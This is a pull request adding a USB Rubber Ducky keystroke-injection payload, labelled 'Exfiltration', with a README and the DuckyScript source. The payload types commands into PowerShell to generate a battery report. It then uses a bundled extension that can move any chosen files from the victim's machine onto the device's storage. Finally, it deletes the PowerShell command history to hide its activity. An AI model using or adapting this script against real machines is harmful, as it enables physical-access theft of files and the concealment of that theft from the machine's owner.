### PR TITLE
Add windows check battery

### DIFF
--- a/payloads/library/exfiltration/Windows_Check_Battery/README.md
+++ b/payloads/library/exfiltration/Windows_Check_Battery/README.md
@@ -1,0 +1,38 @@
+# Windows Check Battery
+
+This script is a Rubber Ducky payload designed for Windows environments to check battery information and save files to a USB Rubber Ducky storage. The script performs two primary functions:
+
+1. **Battery Report Generation**: It retrieves the battery report using PowerShell.
+2. **File Saving Functionality**: It can save one or more files to the USB Rubber Ducky storage, based on the configuration.
+
+### Details
+
+- **Title**: Windows Check Battery
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: Windows
+
+---
+
+### Dependencies
+
+- Do not change the definition name `#SINGLE_PATH` but only the value given `/batteryreport` as it is used in the extension used to exfiltrate the file.
+
+    `DEFINE #SINGLE_PATH /batteryreport`
+
+- Be careful to change the configuration data of the extension used to exfiltrate the file. All information is within the annotated block.
+
+    ```
+        DEFINE #DRIVER_LABEL DUCK
+        DEFINE #FLAG_SINGLE_FILE TRUE
+    ```
+
+## How It Works 📜
+
+1. Sets a user-defined path `#SINGLE_PATH`.
+2. Uses the extension `EXTENSION PASSIVE_WINDOWS_DETECT` to detect when the device is ready...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Powershell**.
+   - Execute the command `powercfg #SINGLE_PATH`
+4. Uses the extension `SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS` to save the file into the Rubber Ducky Storage

--- a/payloads/library/exfiltration/Windows_Check_Battery/payload.txt
+++ b/payloads/library/exfiltration/Windows_Check_Battery/payload.txt
@@ -1,0 +1,154 @@
+
+REM ##########################################
+REM #                                        #
+REM # Title        : Windows Check battery   #
+REM # Author       : bst04 - Aleff           #
+REM # Version      : 1.0                     #
+REM # Category     : Exfiltration            #
+REM # Target       : Windows                 #
+REM #                                        #
+REM ##########################################
+
+REM Do not change the definition name `#SINGLE_PATH` but only the value given `/batteryreport` as it is used in the extension used to exfiltrate the file.
+DEFINE #SINGLE_PATH /batteryreport
+
+REM_BLOCK
+    Credits:    Hak5 LLC
+    Website:    https://hak5.org/
+    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r
+DELAY 750
+STRINGLN powershell
+DELAY 750
+STRINGLN powercfg #SINGLE_PATH
+DELAY 750
+
+REM_BLOCK
+    Credits:    Aleff
+    Website:    https://aleff-gitlab.gitlab.io/
+    Source:     https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE
+END_REM
+
+EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS
+    REM VERSION 1.0
+    REM AUTHOR: Aleff
+    REM_BLOCK Documentation
+        This extension is used to save one or more files through the USB Rubber Ducky storage.
+
+        TARGET:
+            Windows 10/11
+
+        USAGE:
+            Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.
+
+        CONFIGURATION:
+            Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.
+
+            Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.
+            In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.
+                i.e. in DuckyScript EXTENSION
+                    DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
+                i.e. in PowerShell before extension
+                    $fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
+
+            Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.
+            In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.
+                i.e. in PowerShell before extension:
+                    $fileToSavePaths = @(
+                        "C:\Users\Aleff\Downloads\photo.png",
+                        "C:\Users\Aleff\Downloads\document.pdf",
+                        "C:\Users\Aleff\Downloads\song.mp3"
+                    )
+                Some tips:
+                    How to create an Array?
+                        > $fileToSavePaths = @()
+                    How to add an element?
+                        > $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
+                    How to see the array?
+                        > $fileToSavePaths
+    END_REM
+    REM Settings
+    DEFINE #DRIVER_LABEL DUCK
+    DEFINE #FLAG_SINGLE_FILE TRUE
+
+    REM Extension Code
+    FUNCTION SAVE_SINGLE_FILE()
+        IF ( #SINGLE_PATH != 0 ) THEN
+            STRINGLN mv #SINGLE_PATH >> ${m}:\
+        ELSE IF ( #SINGLE_PATH == 0 ) THEN
+            STRINGLN mv ${fileToSavePath} >> ${m}:\
+        END_IF
+    END_FUNCTION
+
+    FUNCTION SAVE_MULTIPLE_FILES()
+        STRINGLN
+            foreach ($fileToSavePath in $fileToSavePaths) {
+                mv ${fileToSavePath} >> ${m}:\
+            }
+        END_STRINGLN
+    END_FUNCTION
+
+    STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;
+    IF_DEFINED_TRUE #FLAG_SINGLE_FILE
+        SAVE_SINGLE_FILE()
+    END_IF_DEFINED
+    IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE
+        SAVE_MULTIPLE_FILES()
+    END_IF_DEFINED
+END_EXTENSION
+
+DELAY 2000
+
+REM_BLOCK
+    Credits:    ShellHacks
+    Website:    https://www.shellhacks.com
+    Source:     https://www.shellhacks.com/clear-history-powershell/
+END_REM
+
+REM Clear the command history in PowerShell by deleting the history file
+STRINGLN Remove-Item (Get-PSReadlineOption).HistorySavePath; exit


### PR DESCRIPTION
This script is a Rubber Ducky payload designed for Windows environments to check battery information and save files to a USB Rubber Ducky storage. The script performs two primary functions:

- **Battery Report Generation**: It retrieves the battery report using PowerShell.
- **File Saving Functionality**: It can save one or more files to the USB Rubber Ducky storage, based on the configuration.

